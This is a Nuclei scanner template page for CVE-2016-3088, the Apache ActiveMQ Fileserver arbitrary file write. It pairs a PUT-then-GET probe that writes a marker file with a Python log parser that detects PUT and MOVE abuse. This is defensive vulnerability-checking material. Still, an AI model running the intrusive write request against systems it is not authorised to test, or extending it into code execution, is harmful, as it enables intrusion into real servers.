
Apache ActiveMQ Fileserver - Arbitrary File Write

ID: CVE-2016-3088

Severity: critical

Author: fq_hsu

Tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive

Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.

```yaml
id: CVE-2016-3088

info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  impact: |
    An attacker can write arbitrary files on the server, potentially leading to remote code execution.
  remediation: |
    Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    - http://rhn.redhat.com/errata/RHSA-2016-2036.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
    epss-score: 0.83955
    epss-percentile: 0.98478
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: activemq
    shodan-query:
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive

variables:
  rand1: '{{rand_int(11111111, 99999999)}}'

http:
  - raw:
      # Request 1: write a harmless text file containing the random marker.
      # The blank line after the Host header separates headers from the body.
      - |
        PUT /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

        {{rand1}}

      # Request 2: read the file back to confirm the write landed.
      - |
        GET /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==204"
          - "status_code_2==200"
          - "contains((body_2), '{{rand1}}')"
        condition: and
# digest: 490a00463044022048cfd4a8d824dc36093eea9675963f9508728a3819bd767b959f779361f3063102200428469d6046a4ec7ddd4545a53f291c5cc186b544da3acd75452088029e496c:922c64590222798bb761d5b6d8e72950
```

This Nuclei template confirms the vulnerability by writing a small text file with a random marker to the Fileserver web application via HTTP PUT (expecting 204), then fetching it with GET (expecting 200) and checking that the marker is returned in the body. Because it writes to the target, it is tagged intrusive; run it only against systems you are authorised to test.

```shell
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-3088.yaml"
```
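For teams watching an exposed broker rather than scanning it, the same PUT/MOVE pattern the description names, and the PUT/GET pattern the template uses, can be pulled out of web access logs. The following is an added example, not part of the Nuclei template or the ActiveMQ project; it assumes a Common Log Format-style layout and the sample lines are constructed.

```python
"""Flag write attempts against /fileserver/ in access logs (CVE-2016-3088 pattern)."""
import re
from collections import defaultdict

# Constructed sample log lines (assumed Common Log Format: client, method, path, status).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "PUT /fileserver/a1b2c3.txt HTTP/1.1" 204 0
10.0.0.5 - - [01/Jan/2016:10:00:02 +0000] "MOVE /fileserver/a1b2c3.txt HTTP/1.1" 204 0
10.0.0.9 - - [01/Jan/2016:10:01:00 +0000] "GET /admin/ HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2016:10:02:00 +0000] "PUT /fileserver/probe.txt HTTP/1.1" 204 0
10.0.0.7 - - [01/Jan/2016:10:02:01 +0000] "GET /fileserver/probe.txt HTTP/1.1" 200 8
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse(line):
    """Return (client, method, path, status) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    return client, method, path, int(status)


def find_fileserver_writes(log_text):
    """Return findings as (client, path, kind).

    kind is 'put' for any accepted PUT under /fileserver/ (the template's own
    check produces one of these) and 'put_move' when the same client later
    MOVEs a path it previously PUT, which is the sequence the advisory describes.
    """
    pending = defaultdict(set)  # client -> paths it has successfully PUT
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        client, method, path, status = rec
        if not path.startswith("/fileserver/"):
            continue
        if method == "PUT" and status < 300:
            pending[client].add(path)
            findings.append((client, path, "put"))
        elif method == "MOVE" and path in pending[client]:
            findings.append((client, path, "put_move"))
    return findings
```

On the sample above this reports two accepted PUTs and one PUT-then-MOVE sequence from 10.0.0.5; a single accepted PUT to /fileserver/ is already worth an alert on a broker that should not be writable.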
